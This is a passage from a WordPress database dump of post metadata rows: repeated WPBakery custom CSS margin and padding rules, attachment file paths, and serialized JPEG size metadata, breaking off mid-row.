(20034,3159,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20035,3160,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20036,3161,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20037,3162,'_wp_attached_file','2022/11/c22-e1668011518345.jpg'),
(20038,3162,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1068;s:6:\"height\";i:649;s:4:\"file\";s:30:\"2022/11/c22-e1668011518345.jpg\";s:8:\"filesize\";i:502445;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"c22-e1668011518345-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13322;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"c22-e1668011518345-1024x622.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:622;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103561;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"c22-e1668011518345-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6060;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"c22-e1668011518345-768x467.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:467;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66706;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:30:\"c22-e1668011518345-500x304.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32588;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:30:\"c22-e1668011518345-800x486.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70981;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20039,3163,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20040,3164,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20041,3162,'_edit_lock','1668011964:1'),
(20042,3162,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1149;s:6:\"height\";i:650;s:4:\"file\";s:7:\"c22.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"c22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6108;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:15:\"c22-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12713;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:15:\"c22-768x434.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63183;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:16:\"c22-1024x579.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99685;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:15:\"c22-500x283.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31152;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:15:\"c22-800x453.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67898;}}'),
(20043,3162,'_edit_last','1'),
(20044,3162,'_wp_page_template','default'),
(20045,3162,'dt-video-url',''),
(20046,3162,'dt-img-link',''),
(20047,3162,'dt-img-hide-title','0'),
(20048,3165,'_wp_attached_file','2022/11/main22-e1669405716521.jpg'),
(20049,3165,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:458;s:4:\"file\";s:33:\"2022/11/main22-e1669405716521.jpg\";s:8:\"filesize\";i:756585;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"main22-e1669405716521-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9570;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"main22-e1669405716521-1024x335.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74716;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"main22-e1669405716521-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7664;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"main22-e1669405716521-768x251.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47764;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"main22-1536x502.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155540;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:33:\"main22-e1669405716521-500x164.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22688;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:33:\"main22-e1669405716521-800x262.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50858;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:34:\"main22-e1669405716521-1280x419.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107909;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20050,3166,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20052,3167,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20053,3168,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20054,3169,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20055,3170,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20057,3171,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20058,3172,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20059,3173,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20060,3174,'_wp_attached_file','2022/11/mlogo-11.jpg'),
(20061,3174,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2400;s:6:\"height\";i:277;s:4:\"file\";s:20:\"2022/11/mlogo-11.jpg\";s:8:\"filesize\";i:177288;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"mlogo-11-300x35.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:35;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2590;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"mlogo-11-1024x118.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15520;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"mlogo-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5070;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"mlogo-11-768x89.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9852;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"mlogo-11-1536x177.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28147;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:21:\"mlogo-11-2048x236.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:236;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41108;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:19:\"mlogo-11-500x58.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:58;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5350;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:19:\"mlogo-11-800x92.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11066;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:21:\"mlogo-11-1280x148.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21502;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:21:\"mlogo-11-1920x222.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20062,3175,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 